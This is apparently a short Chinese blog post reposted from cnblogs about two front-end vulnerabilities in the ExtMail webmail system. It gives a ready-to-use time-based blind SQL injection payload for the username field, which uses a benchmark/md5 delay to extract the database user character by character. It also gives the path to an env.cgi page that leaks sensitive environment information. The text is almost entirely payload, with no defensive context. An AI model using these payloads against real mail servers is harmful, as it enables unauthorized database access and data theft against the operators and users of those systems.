标签:extmail 应用 ext 应用安全 user pre min bsp benchmark
前台SQL注入
payload(username处存在延迟注入):
admin‘ AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23
前台敏感信息泄露
payload: http://xxx.xxx.com/extmail/cgi/env.cgi
标签:extmail 应用 ext 应用安全 user pre min bsp benchmark
原文地址:https://www.cnblogs.com/AtesetEnginner/p/12329522.html